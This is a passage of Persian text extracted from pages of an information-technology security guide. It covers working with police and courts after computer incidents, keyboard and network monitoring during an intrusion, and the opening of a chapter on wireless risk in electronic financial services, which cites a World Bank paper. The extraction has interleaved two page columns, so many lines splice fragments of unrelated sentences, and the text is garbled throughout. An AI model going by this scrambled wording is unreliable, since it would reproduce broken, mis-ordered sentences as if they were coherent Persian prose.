‫ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﻣﻴﺎﻥ ﺑﮕﺬﺍﺭﻳـﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﻃﺒﻘﻪ ﺑﻨـﺪﻱ ﺷـﺪﻩ )ﺍﻋـﻢ ﺍﺳـﺮﺍﺭ ﺗﺠـﺎﺭﻱ‪ ،‬ﺗـﺼﺎﻭﻳﺮ‬
‫ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﻣﺸﻜﻠﻲ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻳﺪ ﻛﻪ ﻻﺯﻡ ﺑـﻮﺩ ﺩﺭ ﺁﻥ‬
‫ﻣﺴﺘﻬﺠﻦ ﻛﻮﺩﻛﺎﻥ‪ ،‬ﻭ ‪ (...‬ﻳـﺎ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻣـﻮﺭﺩ‬
‫ﺍﺯ ﻛﻤﻚ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑﻬـﺮﻩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺣﻜـﻢ‬
‫ﺑﮕﻴﺮﻳﺪ‪ ،‬ﻳﻚ ﺁﺷﻨﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺗﻮﻗﻴﻒ‪ ،‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ ﻣـﺼﺎﺩﺭﻩ ﺷـﻮﻧﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺧـﻼﻝ‬
‫ﺑﺴﻴﺎﺭ ﻛﺎﺭﺳﺎﺯ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﺤﻘﻴﻖ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺎﺑﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻛﺎﺭﻣﻨﺪ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬
‫ﭘﻴﻮﺳﺘﻦ ﺑﻪ ﺟﻮﺍﻣﻊ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﻣـﺪﺍﻭﻡ ﺩﺭ‬ ‫•‬ ‫ﺷﻤﺎ ﻣﺤﺪﻭﺩ ﺑﻮﺩﻩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﻳﺮﺓ ﺍﻳﻦ ﺗﻮﻗﻴﻒﻫﺎ ﻛﺎﻫﺶ ﭘﻴﺪﺍ‬
‫ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺑﻪ ﺍﻓـﺮﺍﺩ ﺁﮔـﺎﻫﻲ ﻭ ﺁﻣـﻮﺯﺵ ﻣـﻲﺩﻫﻨـﺪ ﺗـﺎ‬ ‫ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎﺯ ﻫﻢ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺑﺨﺸﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﻤﺎ ﻃـﻲ‬
‫ﺗﺨﺼﺺ ﺁﻧﻬﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑـﺪ ﺭﺍ ﻓﺮﺍﻣـﻮﺵ‬ ‫ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺳﻤﻲ ﺩﺭ ﺗﻮﻗﻴﻒ ﺑﺎﻗﻲ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ‪.‬‬
‫ﻧﻜﻨﻴﺪ‪.‬‬
‫ﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻛﺸﻮﺭ‪،‬‬
‫ﺍﮔﺮ ﭘﻠﻴﺲ ﻣﺤﻠﻲ ﻳﺎ ﻣﻘﺎﻣﺎﺕ ﻛـﺸﻮﺭﻱ ﻣﻌﺘﻘـﺪ ﺑﺎﺷـﻨﺪ ﻣـﺪﺍﺭﻛﻲ‬
‫ﻣﺒﻨﻲ ﺑﺮ ﺗﺨﻄﻲ ﺍﺯ ﻗﺎﻧﻮﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻳـﻚ ﻗﺎﺿـﻲ ﺗﻘﺎﺿـﺎﻱ‬
‫ﻣﺠﻮﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺿﻲ ﻧﻴﺰ ﺣﻜـﻢ ﺗﺤﻘﻴـﻖ‬
‫ﺻــﺎﺩﺭ ﻣــﻲﻧﻤﺎﻳــﺪ‪ .‬ﺩﺭ ﺳــﺎﻟﻬﺎﻱ ﺍﺧﻴــﺮ ﺗﻌــﺪﺍﺩﻱ ﺍﺯ ﺑﺎﺯﺭﺳــﺎﻥ ﻭ‬
‫ﻣﺴﺌﻮﻻﻥ ﻛﺸﻮﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ،‬ﺩﺭ ﺑﺮﺧﻲ ﺍﻳﺎﻟﺘﻬﺎ ﺟﺎﻳﮕﺎﻫﻲ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺳﻨﮕﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﻧﺪ‪ .‬ﻳـﻚ‬
‫ﺩﻟﻴﻞ ﺍﻳﻦ ﺍﻣﺮ‪ ،‬ﻋﺪﻡ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﺑـﺎ ﺍﻧﺠـﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﻭ ﻧﻴﺰ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ‪ ،‬ﺑﻪ ﻣﺮﻭﺭ ﺯﻣﺎﻥ ﺑﻬﺘﺮ ﺷﻮﺩ‪.‬‬

‫ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ‪...‬‬
‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪ ﻭ ﻧﻈـﺎﺭﺕ ﺑـﺮ‬ ‫•‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﻣﺠﻬﺰ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮ‬
‫ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﻳﺎ ﺩﺭﻳﺎﻓﺖﺷﺪﻩ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ‬
‫ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﺒﻂ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺣـﺴﺎﺱ ﻛﺮﺩﻳـﺪ ﻛـﻪ ﻣـﻮﺭﺩ‬
‫ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺳﺮﻳﻌﹰﺎ ﻋﻤﻠﻴـﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ ﺿـﺒﻂ ﺭﺍ‬
‫ﺁﻏﺎﺯ ﻛﻨﻴﺪ ﻭ ﻣﻨﺘﻈﺮ ﺣﻜﻢ ﺩﺍﺩﮔﺎﻩ ﻧﺒﺎﺷﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻧﻴﺮﻭﻫﺎﻱ‬
‫ﻻ ﺑﺪﻭﻥ ﻛﺴﺐ ﺍﺟﺎﺯﻩ ﺍﺯ ﺩﺍﺩﮔﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ‬ ‫ﺍﻧﺘﻈﺎﻣﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﺷﻤﺎ ﻣﺠﻮﺯﻱ ﺑﺪﻫﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺠﺮﻱ ﻗﺎﻧﻮﻥ‬
‫ﻋﻤﻞ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭﻳﺎﻓﺖ ﺣﻜـﻢ ﻗﺎﺿـﻲ ﻣﺒﻨـﻲ ﺑـﺮ ﺍﺟـﺎﺯﺓ‬
‫ﺩﺍﺩﮔﺎﻩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺗﻬﺎ ﺑﻪ ﻃﻮﻝ ﺑﻴﺎﻧﺠﺎﻣﺪ‪.‬‬
‫‪١٨٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺣﻮﺯﺓ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬


‫ﻣﻮﺿﻮﻉ ﺩﺭ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺣـﻮﺯﺓ‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ‪ -‬ﻛﻪ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﻓﻨﺎﻭﺭﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﺑﺎﺯﺍﺭﻫﺎ ﺷﺪﻩ ‪ -‬ﺍﺯ ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ‪ .‬ﻫﺮﭼـﻪ ﻛـﺸﻮﺭﻫﺎ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻴـﺸﺘﺮ ﺗـﻼﺵ‬ ‫ﻓﺼﻞ ﺩﻫﻢ‬
‫ﻛﻨﻨﺪ‪ ،‬ﺗﻮﺟﻪ ﺑﻪ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ‬
‫ﺍﻳﻨﻜﻪ ﺷﺮﻛﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺍﺭ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻭ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪:‬‬
‫ﺳﺎﻳﺮ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺗﻲ ﭼﻘﺪﺭ ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻀﻤﻴﻦ‬ ‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻛﻨﻨﺪ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﻳﻦ ﻓﺼﻞ ﺗﻮﺿـﻴﺢ ﺍﻳـﻦ‬ ‫‪١٣٢‬‬
‫ﻣﻄﻠﺐ ﺍﺳﺖ ﻛﻪ ﭼـﺮﺍ ﻭ ﭼﮕﻮﻧـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﻳـﻚ‬ ‫ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ‬
‫ﺩﻏﺪﻏﻪ ﺗﺒﺪﻳﻞ ﻣﻲ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺪﻭﻥ ﭘﺮﺩﺍﺧﺖ ﻫﺰﻳﻨﺔ‬
‫ﺍﺿﺎﻓﻲ ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﺩﺍﺩ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﺔ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻊ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺩﺭ ﻧﺘﻴﺠـﺔ‬
‫ﻓﻨــﺎﻭﺭﻱ ﺍﻣﻜــﺎﻥ ﺍﺭﺍﺋــﻪ ﺭﺍﻫﻜﺎﺭﻫــﺎﻱ ﺛﺎﺑــﺖ ﻭ ﺗﻐﻴﻴﺮﻧﺎﭘــﺬﻳﺮ ﺭﺍ ﺍﺯ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺳـﻠﺐ ﻛـﺮﺩﻩ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬ ‫ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗـﺴﺨﻴﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳﻴـﺴﺘﻢ‪ ،‬ﻭ ﺳـﺎﻳﺮ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺻﻴﻪ ﺷﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﻗﺪﺍﻣﺎﺕ ﻣﺸﺎﺑﻪ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﭼﻨﺪﻻﻳﻪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻣـﻲﺑﺎﺷـﻨﺪ‪ ،‬ﻭ‬ ‫ﻓﺼﻞ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﮔﺮﭼﻪ "ﺣﺠﻢ" ﻣﻌﺎﻣﻼﺗﻲ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ‬
‫ﻧﻤﺎﻳــﺎﻧﮕﺮ ﺁﻧﭽــﻪ ﺍﻣــﺮﻭﺯ ﺑﻌﻨــﻮﺍﻥ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴــﺖ‬ ‫ﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺑﺮ ﮔﺴﺘﺮﺩﮔﻲ ﺣﻮﺯﺓ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭ ﹺ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺻ‪‬ـﺮﻑ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻳﺮ ﺗﻘﺴﻴﻢ ﺷﺪﻩ‪ :‬ﻗﺴﻤﺖ "ﺍﻟﻒ" ﺧﻮﺍﻧﻨﺪﻩ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻧﻘﺎﻁ ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺠﺎﻣـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﺭﺍ ﺑﺎ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬ ‫ﻓﺼﻞ ﭼﻨﺪ ﻧﻜﺘﺔ ﻣﻬﻢ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ ﻛـﻪ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺁﺷﻨﺎ ﻣﻲﻛﻨﺪ؛ ﻗﺴﻤﺖ "ﺏ" ﺑﻪ ﻣﻌﺮﻓﻲ‬ ‫ﺳﻴﺴﺘﻢ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺑﺎﻧﻜﻬﺎ( ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﻣﻲ ﭘﺮﺩﺍﺯﺩ؛ ﻗـﺴﻤﺖ "ﺝ" ﻧﻘـﺎﻁ‬ ‫ﻻ ﺑـﺪﻭﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩ ﻫﺰﻳﻨـﺔ‬‫ﺗﺎ ﺑﻴﺸﺘﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺿﻌﻒ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺑـﻲﺳـﻴﻢ )‪ ١٣٣(WLANs‬ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬ ‫ﺗﻤﺎﻡﺷﺪﻩ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ .‬ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﻓـﺼﻞ‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺁﻧﻬـﺎ ﻻﺯﻡ ﻫـﺴﺘﻨﺪ ﺭﺍ‬ ‫ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺑﻪ ﻧﻮﻋﻲ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺷﺮﺡ ﻣﻲﺩﻫﺪ؛ ﻗﺴﻤﺖ "ﺩ" ﺑـﻪ ﺗﻜﺎﻣـﻞ ﺷـﺒﻜﻪ ﻫـﺎﻱ ﺳﺮﺍﺳـﺮﻱ‬ ‫ﺩﺭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﺭﺍ ﻧﻴـﺰ ﺩﺭ ﺑـﺮ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﺳﻴﺎﺭ )ﺷﺒﻜﻪﻫﺎﻱ ‪ ١٣٤(GSM‬ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬـﺎ‬ ‫ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻗﺴﻤﺖ "ﻩ" ﺟﺰﺋﻴﺎﺕ ﺭﻭﺷـﻬﺎﻱ ﺻـﺤﻴﺢ ﻣﻮﺍﺟﻬـﻪ ﺑـﺎ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺷﺒﻜﻪﻫﺎﻱ ‪ GSM‬ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲ ﺩﻫـﺪ؛ ﻗـﺴﻤﺖ "ﻭ"‬ ‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ‬
‫ﺑﻪ ﺍﺭﺍﺋﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬ ‫ﺻﻨﺎﻳﻊ ﻭ ﺑﺨﺸﻬﺎﻱ ﺟﺪﻳﺪ‬
‫ﭘﺮﺩﺍﺧﺖ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻭ ﻗﺴﻤﺖ "ﺯ" ﻧﻴﺰ ﻳﻚ ﺟﻤﻊﺑﻨـﺪﻱ ﻧﻬـﺎﻳﻲ ﻭ‬
‫ﺭﺷﺪ ﺳﺮﻳﻊ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫـﺎﻱ‬
‫ﺩﻭﺭﻧﻤﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﻩ )ﻧﺴﻞ ﺳﻮﻡ؛ ‪ (3G‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪ ،‬ﺗﻮﺟـﻪ ﺩﻗﻴـﻖ ﺑـﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ‬
‫ﻫﺪﻑ ﺍﻳﻦ ﻓـﺼﻞ ﺍﺭﺍﺋـﻪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺖ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ‬
‫‪ ۱۳۲‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻘﺎﻟﺔ ﺑﺎﻧﻚ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﻗﻠـﻢ ‪Tom Kellerman‬‬
‫ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ ﻓــﺼﻞ ﺗــﻼﺵ ﻣــﻲﻛﻨــﺪ ﺑــﺴﺘﺮﻱ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ‬ ‫ﺗﺤﺖ ﻋﻨﻮﺍﻥ‪:‬‬
‫‪"Mobile Risk Management: e-Finance for the‬‬
‫‪Wireless Environment (2002)":‬‬
‫‪133 Wireless Local Area Networks‬‬ ‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪134 Global System for Moblile Communication‬‬ ‫‪ectorWeb.nsf/SearchGeneral?openform&E-‬‬
‫‪Networks‬‬ ‫‪Security/E-Finance&Publications‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨٦‬‬

‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﻗﺴﻤﺖ ﺍﺻﻠﻲ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ‪:‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ﻗﺎﺑﻞ ﻛـﺎﺭﺑﺮﺩ‬
‫ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ )‪ ،١٣٧(EFT‬ﺗﺒــﺎﺩﻝ ﺩﺍﺩﺓ‬ ‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪ ،١٣٨(EDI‬ﺍﻧﺘﻘـﺎﻝ ﺳـﻮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )‪ ١٣٩(EBT‬ﻭ‬
‫‪١٣٥‬‬
‫ﺗﺄﻳﻴـــﺪ ﺗﺠـــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ )‪ EFT .١٤٠(ETC‬ﺩﺭ ﻭﺍﻗـــﻊ‬ ‫ﺍﻟﻒ‪ .‬ﻛﻠﻴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
